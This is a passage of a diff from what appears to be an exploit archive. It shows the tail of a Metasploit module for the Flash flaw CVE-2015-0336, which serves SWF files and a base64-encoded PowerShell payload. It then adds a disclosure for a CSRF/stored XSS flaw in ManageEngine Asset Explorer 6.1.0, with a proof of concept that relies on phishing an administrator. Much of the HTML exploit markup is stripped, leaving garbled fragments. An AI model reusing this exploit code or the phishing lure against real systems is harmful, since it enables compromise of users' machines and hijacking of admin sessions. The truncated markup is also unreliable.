'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + @trigger = create_trigger + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status('Sending SWF...') + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + target_payload = get_payload(cli, target_info) + psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) + b64_payload = Rex::Text.encode_base64(psh_payload) + + trigger_hex_stream = @trigger.unpack('H*')[0] + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'msf.swf') + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + + def create_trigger + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0336', 'trigger.swf') + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end +end \ No newline at end of file diff --git a/platforms/windows/webapps/36960.txt b/platforms/windows/webapps/36960.txt new file mode 100755 index 000000000..5a6b86784 --- /dev/null +++ b/platforms/windows/webapps/36960.txt @@ -0,0 +1,129 @@ +=============================================================================== +CSRF/Stored XSS Vulnerability in Manage Engine Asset Explorer +=============================================================================== + +. contents:: Table Of Content + +Overview +======== + +* Title :CSRF/Stored XSS vulnerability in Manage Engine Asset Explorer +* Author: Kaustubh G. Padwad +* Plugin Homepage: https://www.manageengine.com/products/asset-explorer/ +* Severity: HIGH +* Version Affected: Version 6.1.0 Build: 6110 +* Version Tested : Version 6.1.0 Build: 6110 +* version patched: +* CVE ID : +Description +=========== + +Vulnerable Parameter +-------------------- + +* Too many parameters (All Device properties) + + + +About Vulnerability +------------------- +This Product is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can execute arbitrary code into Asset list(AssetListView.do). Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. + +Vulnerability Class +=================== +Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) +Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) + +Steps to Reproduce: (POC) +========================= +* Add follwing code to webserver and send that malicious link to application Admin. +* The admin should be loggedin when he clicks on the link. +* Soical enginering might help here + +For Example :- Device password has been changed click here to reset + +####################CSRF COde####################### + + + +
+ + + + " /> + " /> + + + + + + + + + + + + + + + + " /> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + +Mitigation +========== +Update to version 6.1 + +Change Log +========== +https://www.manageengine.com/products/asset-explorer/sp-readme.html + +Disclosure +========== +30-March-2015 Reported to Developer +27-April-2015 Fixed By Vendor +credits +======= +* Kaustubh Padwad +* Information Security Researcher +* kingkaustubh@me.com +* https://twitter.com/s3curityb3ast +* http://breakthesec.com +* https://www.linkedin.com/in/kaustubhpadwad \ No newline at end of file